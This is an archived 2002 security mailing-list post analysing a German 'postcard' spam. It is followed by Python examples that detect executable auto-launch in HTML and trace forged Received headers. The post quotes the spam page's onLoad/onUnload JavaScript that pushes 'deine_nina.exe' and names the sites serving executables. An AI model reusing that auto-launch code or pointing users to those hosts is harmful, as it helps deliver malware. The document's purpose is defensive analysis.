[Dshield] Weird German Porn Spam?

Brenna Primrose drxlecter at phreaker.net
Mon Nov 18 00:08:47 GMT 2002


I received a suspicious "postcard" e-mail today, and thinking it might
be something similar to the recent "FriendGreetings" scam, I decided to
check it out.  I first followed the link using IE 6, but it came up with
an error.  I then opened it in Opera 6.05 and viewed the source, which
redirects to http://nina.xfiles24.com.futuresite.register.com/
(216.21.224.200) - some sort of a porno-looking card.  The card is
linked to an executable hosted on netmails.com.  I don't accept popups
in either of these browsers by default, but it looks as if a javascript
on this page attempts to automatically launch an .exe: 

<!--
function MM_openBrWindow(theURL,winName,features) { //v2.0
  window.open(theURL,winName,features);
}
//-->
</script>
</HEAD>
<BODY vLink=#9933ff aLink=#9933ff link=#9933ff bgColor=#000080
onUnload="MM_openBrWindow('deine_nina.exe','','')"
onLoad="MM_openBrWindow('deine_nina.exe','','')">

It's probably just a run-of-the-mill dialer program, but I don't have a
test machine to mess with it.

A further look at http://www.netmails.com/members/ will attempt to have
you download an executable from pluginaccess.com named
"Browser_Plugin.exe".

The spammer also tries to throw us off by using a bunch of fake IPs in
the message header.  SpamCop traced it back to
213-97-146-10.uc.nombres.ttd.es [213.97.146.10].  I'm just curious if
anyone has seen this one before?  I Googled on this but most of the
things I found were in German.

Thanks,

Brenna

----------------Message and header (trimmed header, but all of the spammer's details are there)--------------------

Received: from 66.87.118.28 (213-97-146-10.uc.nombres.ttd.es
[213.97.146.10])
	by mx2.phreaker.net (Postfix) with SMTP id C75061B0318
	for <drxlecter at phreaker.net>; Sun, 17 Nov 2002 23:28:49 +0000
(UTC)
Received: from 152.74.145.157 ([152.74.145.157]) by hd.regsoft.net with
esmtp; Nov, 18 2002 00:15:15 +1200
Received: from smtp-server6.tampabay.rr.com ([12.232.159.86]) by
mailout2-eri1.midsouth.rr.com with asmtp; Nov, 17 2002 23:27:33 +1100
Received: from unknown (HELO f64.law4.hotmail.com) (13.61.40.178) by
ssymail.ssy.co.kr with smtp; Nov, 17 2002 22:11:21 +0700
From: Postcard Team <postcard_team at pkard.com>
To: drxlecter at phreaker.net
Cc: 
Subject: Du hast eine Postkarte von Nina bekommen....
Sender: Postcard Team <postcard_team at pkard.com>
Mime-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
X-Quarantined-Date: Mon, 18 Nov 2002 00:29:40 +0100
X-Mailer: AOL 7.0 for Windows US sub 118
X-Priority: 1
Message-Id: <20021117232849.C75061B0318 at mx2.phreaker.net>
X-pstn-levels:     (C:75.3595 M:98.9583 P:95.9108 S: 2.6290 )
X-pstn-settings: 5 (2.0000:8.0000) pmCr
X-pstn-addresses: from <postcard_team at pkard.com> 
X-pstn-disposition: quarantine
X-UIDL: 'TD"!-L3"!H$f!!jo#"!

<html>
<head>
<title>Untitled Document</title>

</head>

<body bgcolor="#FFFFFF" text="#000000">
<p>You have received a postcard from a friend or a girlfriend -
who knows? 
  :-))<br>
  You can pick up your card at this address:<br>
  <a href="http://nina.xfiles24.com/">To your postcard</a></p>
<p>The card will be available to read on the server for one week</p>
<p>Your Postcard Team<br>
</p>
</body>
</html>

------------------------------------------------------------------------
-----------------------------------

http://profiles.yahoo.com/absolut_contagion 
http://gsa.creighton.edu
AIM - absolutxpsycho
Yahoo! - absolut_contagion
ICQ - 1363187
MSN - r00t at creighton.edu 
-----BEGIN GEEK CODE BLOCK-----
Version: 3.12
GSS d-- s: a-- C++ UL++++ P+ L+ E W++ N+ o-- K- w+ 
O-- M V-- PS++ PE Y+ PGP- t-- 5-- X++ R- tv+ b+++ DI D+ 
G e* h- r++ x+ 
------END GEEK CODE BLOCK------
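The onLoad/onUnload handlers quoted in the post are the kind of thing a mail or web gateway can flag mechanically: an event handler on <body> whose argument is an executable file name, or a plain link to an .exe. The scanner below is an added example written for this archive page, not code from the post or from any of the sites named in it. It assumes Python's standard html.parser is enough for this job and uses a constructed sample page built from the fragment in the post (the opening <script> and the Browser_Plugin.exe link are filled in to make the sample complete); the list of executable extensions beyond .exe is an assumption.

```python
import re
from html.parser import HTMLParser

# Constructed sample: the fragment quoted in the post, wrapped so that it is
# a complete document. The <script> opening tag and the plugin link are
# additions made here for the example, not taken from the original page.
SAMPLE_PAGE = """<html><head><title>card</title><script>
<!--
function MM_openBrWindow(theURL,winName,features) { //v2.0
  window.open(theURL,winName,features);
}
//-->
</script>
</head>
<BODY vLink=#9933ff aLink=#9933ff link=#9933ff bgColor=#000080
onUnload="MM_openBrWindow('deine_nina.exe','','')"
onLoad="MM_openBrWindow('deine_nina.exe','','')">
<a href="Browser_Plugin.exe">install plugin</a>
</BODY></html>"""

# Assumed set of Windows executable extensions worth flagging (.exe is the
# one the post shows; the others are a common gateway default).
EXEC_EXT = (".exe", ".scr", ".pif", ".bat", ".com")
# A quoted string literal inside an event handler that names an executable.
EXEC_LITERAL_RE = re.compile(
    r"['\"]([^'\"]*\.(?:exe|scr|pif|bat|com))['\"]", re.I)


class AutoLaunchScanner(HTMLParser):
    """Collect tags whose event handlers or links point at executables."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # html.parser hands us attribute names already lower-cased.
        for name, value in attrs:
            if value is None:
                continue
            if name.startswith("on"):
                hit = EXEC_LITERAL_RE.search(value)
                if hit:
                    self.findings.append(
                        ("event-handler", tag, name, hit.group(1)))
            elif name in ("href", "src") and value.lower().endswith(EXEC_EXT):
                self.findings.append(("link", tag, name, value))


def scan(html):
    """Return (kind, tag, attribute, target) tuples for every suspicious hit."""
    parser = AutoLaunchScanner()
    parser.feed(html)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_PAGE):
        print(*finding)
```

The two "event-handler" hits on <body> are the signal that matters: a page that tries to hand the browser an .exe both when it loads and when it is closed is not a greeting card, whatever the rest of the markup says. A gateway would quarantine on the first hit; the "link" finding is lower confidence on its own and is better used to enrich the verdict.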
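The header analysis Brenna describes (ignoring the planted Received lines and trusting only what her own MX recorded) is the same thing SpamCop does, and it can be scripted. The following is an added example, not code from the post or from SpamCop: it walks the Received chain top-down, treats only the hop written by the recipient's own MX (assumed here to be mx2.phreaker.net, as in the quoted headers) as trustworthy, and flags the usual forgery signs in the rest: a chain that does not link up, sender-supplied hops, and dates that are not valid RFC 2822. The sample headers are a constructed re-folding of the ones quoted in the post, with standard leading-whitespace continuation lines.

```python
import re
from email.utils import parsedate_to_datetime

# Constructed sample input: the Received chain from the post, re-folded with
# RFC 2822 continuation lines (tab-indented) so it can be unfolded cleanly.
SAMPLE_HEADERS = (
    "Received: from 66.87.118.28 (213-97-146-10.uc.nombres.ttd.es\n"
    "\t[213.97.146.10])\n"
    "\tby mx2.phreaker.net (Postfix) with SMTP id C75061B0318\n"
    "\tfor <drxlecter@phreaker.net>; Sun, 17 Nov 2002 23:28:49 +0000 (UTC)\n"
    "Received: from 152.74.145.157 ([152.74.145.157]) by hd.regsoft.net with\n"
    "\tesmtp; Nov, 18 2002 00:15:15 +1200\n"
    "Received: from smtp-server6.tampabay.rr.com ([12.232.159.86]) by\n"
    "\tmailout2-eri1.midsouth.rr.com with asmtp; Nov, 17 2002 23:27:33 +1100\n"
    "Received: from unknown (HELO f64.law4.hotmail.com) (13.61.40.178) by\n"
    "\tssymail.ssy.co.kr with smtp; Nov, 17 2002 22:11:21 +0700\n"
)

IPV4_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")
HOP_RE = re.compile(
    r"from\s+(?P<claimed>\S+)"            # what the sending side announced
    r"(?:\s+\((?P<observed>[^)]*)\))?"    # what the receiving MTA recorded
    r".*?\bby\s+(?P<by>\S+)"              # the MTA that wrote this line
    r"(?:.*?;\s*(?P<date>[^\n]*))?$",     # timestamp follows the last ';'
    re.S,
)


def unfold(raw):
    """Join continuation lines (those starting with whitespace) onto their header."""
    lines = []
    for line in raw.splitlines():
        if line[:1] in (" ", "\t") and lines:
            lines[-1] += " " + line.strip()
        else:
            lines.append(line.rstrip())
    return lines


def received_hops(raw):
    """Received hops top-down: the first one was added by our own MX, the last by the origin."""
    return [l[len("Received:"):].strip() for l in unfold(raw)
            if l.lower().startswith("received:")]


def analyze(raw, our_mx):
    """Trust only the hop our own MX wrote; list what is wrong with the others."""
    hops = received_hops(raw)
    report = {"origin_ip": None, "origin_rdns": None, "findings": []}
    for n, hop in enumerate(hops):
        m = HOP_RE.search(hop)
        if not m:
            report["findings"].append((n, "unparseable Received line"))
            continue
        claimed, by = m.group("claimed"), m.group("by")
        observed = m.group("observed") or ""
        # Chain check: the host this hop says it came from should be the MTA
        # that wrote the hop below it. Planted hops almost never line up.
        if n + 1 < len(hops):
            nxt = HOP_RE.search(hops[n + 1])
            if nxt and nxt.group("by") not in (claimed, observed):
                report["findings"].append(
                    (n, "chain break: from %s, but next hop written by %s"
                     % (claimed, nxt.group("by"))))
        if n == 0 and by == our_mx:
            # The only hop we can believe: the peer our MX actually saw.
            ips = IPV4_RE.findall(observed)
            report["origin_ip"] = ips[-1] if ips else None
            report["origin_rdns"] = observed.split()[0] if observed else None
            if claimed != report["origin_ip"]:
                report["findings"].append(
                    (n, "sender claimed to be %s but connected from %s"
                     % (claimed, report["origin_ip"])))
            continue
        report["findings"].append((n, "sender-supplied hop, not trustworthy"))
        try:
            parsedate_to_datetime(m.group("date") or "")
        except (TypeError, ValueError):  # older Pythons raise TypeError on None
            report["findings"].append(
                (n, "date is not RFC 2822: %r" % m.group("date")))
    return report


if __name__ == "__main__":
    r = analyze(SAMPLE_HEADERS, "mx2.phreaker.net")
    print("origin:", r["origin_ip"], r["origin_rdns"])
    for n, msg in r["findings"]:
        print("hop %d: %s" % (n, msg))
```

On these headers the origin resolves to 213.97.146.10 (213-97-146-10.uc.nombres.ttd.es), matching the SpamCop result in the post, while every planted hop fails both the chain check and the date check: "Nov, 18 2002 00:15:15 +1200" is not a valid RFC 2822 date, and none of the three fake hops names the MTA that supposedly wrote the next one. The "from 66.87.118.28" on the trusted hop is only the HELO string the sender chose; the bracketed address is what the MX saw on the wire, which is why the script takes the last IP inside the parentheses rather than the announced one.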